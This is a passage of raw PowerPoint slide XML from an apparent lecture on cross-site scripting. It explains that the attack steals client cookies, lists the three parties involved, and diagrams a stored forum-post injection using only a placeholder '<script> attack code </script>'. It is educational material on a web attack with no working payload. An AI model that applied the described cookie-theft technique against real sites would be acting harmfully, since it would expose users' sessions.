              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="696912" y="1678543"/>
            <a:ext cx="7078076" cy="4279345"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:no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ar-SA" sz="2600" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>The goal of the CSS attack is to steal the client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ar-SA" sz="2600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ar-SA" sz="2600" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, or any other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ar-SA" sz="2600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>sensitive information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ar-SA" sz="2600" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, which can identify the client with the web site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">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r>
              <a:rPr lang="en-GB" altLang="ar-SA" sz="2600" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ar-SA" sz="2600" b="1" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Unlike</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ar-SA" sz="2600" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> most attacks, which involve two parties – the attacker, and the web site, or the attacker and the victim client, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ar-SA" sz="2600" b="1" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>the CSS attack involves three parties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ar-SA" sz="2600" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> – the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ar-SA" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>attacker, a client and the web site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:tabLst>
                <a:tab pos="656722" algn="l"/>
                <a:tab pos="1313444" algn="l"/>
                <a:tab pos="1970166" algn="l"/>
                <a:tab pos="2626888" algn="l"/>
                <a:tab pos="3283610" algn="l"/>
                <a:tab pos="3940332" algn="l"/>
                <a:tab pos="4597055" algn="l"/>
                <a:tab pos="5253777" algn="l"/>
                <a:tab pos="5910499" algn="l"/>
                <a:tab pos="6567221" algn="l"/>
                <a:tab pos="7223943" algn="l"/>
                <a:tab pos="7880665" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="ar-SA" sz="2600" dirty="0">
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3199058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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C14D67CB-E5E8-E02E-DD80-CA3845E8A1DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="708641" y="1754485"/>
            <a:ext cx="6992620" cy="4023360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:no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altLang="ar-SA" sz="2400"/>
              <a:t>The players:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ar-SA" b="1"/>
              <a:t>An Attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ar-SA" sz="2400"/>
              <a:t>Anonymous Internet User</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ar-SA" sz="2400"/>
              <a:t>Malicious Internal User</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ar-SA" b="1"/>
              <a:t>A company’s Web server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ar-SA"/>
              <a:t>(i.e. Web application)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ar-SA" sz="2400"/>
              <a:t>External (e.g.: Shop, Information, CRM, Supplier)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ar-SA" sz="2400"/>
              <a:t>Internal (e.g.: Employees Self Service Portal)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ar-SA" b="1"/>
              <a:t>A Client </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ar-SA" sz="2400"/>
              <a:t>Any type of customer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ar-SA" sz="2400"/>
              <a:t>Anonymous user accessing the Web-Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ar-SA" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="875815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87D32779-61AD-32B1-8F62-EC4EF46BEFAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1082934" y="2107024"/>
            <a:ext cx="7384247" cy="2791580"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:norm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r>
              <a:rPr lang="en-US" altLang="ar-SA" sz="2400" dirty="0"/>
              <a:t>Static websites are not at risk.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ar-SA" sz="2400" dirty="0"/>
              <a:t>Dynamic websites (using AJAX, Flex, for example) are vulnerable. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>XSS differs from other web attack vectors (e.g., SQL injections), in that it does not directly target the application itself. Instead, the users of the web application are the ones at risk.</a:t>
            </a:r>
            <a:endParaRPr lang="ar-SA" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3969073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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{079C6915-8F83-AE73-A3E0-34CB3DD53D78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9900458" y="6459785"/>
            <a:ext cx="1312025" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{015DCF4E-A524-4102-BE0B-0B6BAB5F1F79}" type="slidenum">
              <a:rPr lang="en-US" altLang="ar-SA"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ar-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73F65A26-7AE6-45E9-9328-83FFAB53818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90800" y="2209800"/>
            <a:ext cx="857250" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF9999"/>
          </a:solidFill>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22FB2B9D-A92B-34F7-EDAE-B886BA02745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81800" y="5257800"/>
            <a:ext cx="857250" cy="9144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server">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A56E792-4E17-926A-0BC6-737955536C9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58000" y="2133600"/>
            <a:ext cx="730250" cy="1143000"/>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36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18FD0CA9-F4D5-0F5F-DFA1-7FE8FE6A016F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="2127252"/>
            <a:ext cx="3276600" cy="738889"/>
            <a:chOff x="1248" y="1340"/>
            <a:chExt cx="2064" cy="353"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Line 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B862A736-B9AC-DA36-C10E-C3E061BDE403}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1248" y="1536"/>
              <a:ext cx="206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9" name="Text Box 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5ED67441-E372-1B2D-99BE-35F6510B1F10}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1584" y="1340"/>
              <a:ext cx="1304" cy="353"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF99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de-DE" altLang="ar-SA" sz="1000" dirty="0"/>
                <a:t>Post </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" altLang="ar-SA" sz="1200" dirty="0"/>
                <a:t>Forum</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" altLang="ar-SA" sz="1000" dirty="0"/>
                <a:t> Message:</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" altLang="ar-SA" sz="1000" dirty="0" err="1"/>
                <a:t>Subject</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" altLang="ar-SA" sz="1000" dirty="0"/>
                <a:t>: GET Money </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" altLang="ar-SA" sz="1000" dirty="0" err="1"/>
                <a:t>for</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" altLang="ar-SA" sz="1000" dirty="0"/>
                <a:t> FREE !!!</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" altLang="ar-SA" sz="1000" dirty="0"/>
                <a:t>Body:</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" altLang="ar-SA" sz="1000" dirty="0"/>
                <a:t>&lt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" altLang="ar-SA" sz="1000" dirty="0" err="1"/>
                <a:t>script</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" altLang="ar-SA" sz="1000" dirty="0"/>
                <a:t>&gt; </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" altLang="ar-SA" sz="1000" dirty="0" err="1"/>
                <a:t>attack</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" altLang="ar-SA" sz="1000" dirty="0"/>
                <a:t> code &lt;/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" altLang="ar-SA" sz="1000" dirty="0" err="1"/>
                <a:t>script</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" altLang="ar-SA" sz="1000" dirty="0"/>
                <a:t>&gt;</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ar-SA" sz="1000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Box 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF8C410E-7EC0-221B-D3DD-FF5B585C4F25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1962717" y="3731173"/>
            <a:ext cx="265117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dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="ar-SA" sz="1400" dirty="0" err="1"/>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="ar-SA" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="ar-SA" sz="1400" dirty="0" err="1"/>
              <a:t>sends</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="ar-SA" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="ar-SA" sz="1400" dirty="0" err="1"/>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="ar-SA" sz="1400" dirty="0"/>
              <a:t> code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ar-SA" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Box 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E829F6F1-3E2E-70D0-F7B4-158B855E0D2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1956133" y="4164560"/>
            <a:ext cx="20910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dirty="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="ar-SA" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="ar-SA" sz="1400" dirty="0"/>
              <a:t>Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="ar-SA" sz="1400" dirty="0" err="1"/>
              <a:t>stores</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="ar-SA" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="ar-SA" sz="1400" dirty="0" err="1"/>
              <a:t>message</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ar-SA" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text Box 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B4FB0E0-0C5B-6F66-91CD-3EB6223A4FEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8001000" y="2133600"/>
            <a:ext cx="1981200"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Did you know this?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" altLang="ar-SA" sz="1000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.....</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text Box 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F028C70-3E82-D215-F096-BE93DA3A6CE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1944502" y="4645573"/>
            <a:ext cx="21248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3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="ar-SA" sz="1600"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="ar-SA" sz="1400"/>
              <a:t>User requests message</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ar-SA" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text Box 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCC3BA3A-515B-37B4-AEDA-50F50215621A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1965274" y="5102773"/>
            <a:ext cx="267560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4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="ar-SA" sz="1600"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="ar-SA" sz="1400"/>
              <a:t>Message is delivered by server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ar-SA" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text Box 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6632F956-6128-082A-57A3-5837AA611C8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2016558" y="5559973"/>
            <a:ext cx="301960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5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="ar-SA" sz="1600"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="ar-SA" sz="1400"/>
              <a:t>Browser executes script in message</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ar-SA" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Group 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0F21547-9B96-8C93-15A4-D9AF99D255F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7086600" y="3429000"/>
            <a:ext cx="1981200" cy="1676400"/>
            <a:chOff x="3504" y="2160"/>
            <a:chExt cx="1248" cy="1056"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Line 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F04F0454-7395-867E-1EF7-B452BDFB1536}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="3648" y="2160"/>
              <a:ext cx="0" cy="105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8" name="Text Box 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C615DD7-BE2E-5261-A5A4-53EC0566BBEA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3504" y="2784"/>
              <a:ext cx="1248" cy="252"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF99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GET Money for FREE !!!</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" altLang="ar-SA" sz="1000"/>
                <a:t>&lt;script&gt; attack code &lt;/script&gt;</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ar-SA" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Line 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AB3DD7F-1429-AE2D-8E16-FA9F1A454F71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6858000" y="3830271"/>
            <a:ext cx="0" cy="12461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20" name="Text Box 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BFE54B8-42DD-683D-9468-D26C1CF0B25C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5247259" y="3366613"/>
            <a:ext cx="2144141"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de-DE" altLang="ar-SA" sz="1000" dirty="0"/>
              <a:t>Get /forum.jsp?fid=122&amp;mid=2241</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ar-SA" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text Box 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90F7155D-1795-6CED-2DCE-68B01B0CB6C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514111" y="1752601"/>
            <a:ext cx="113396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Attacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ar-SA" sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text Box 30">
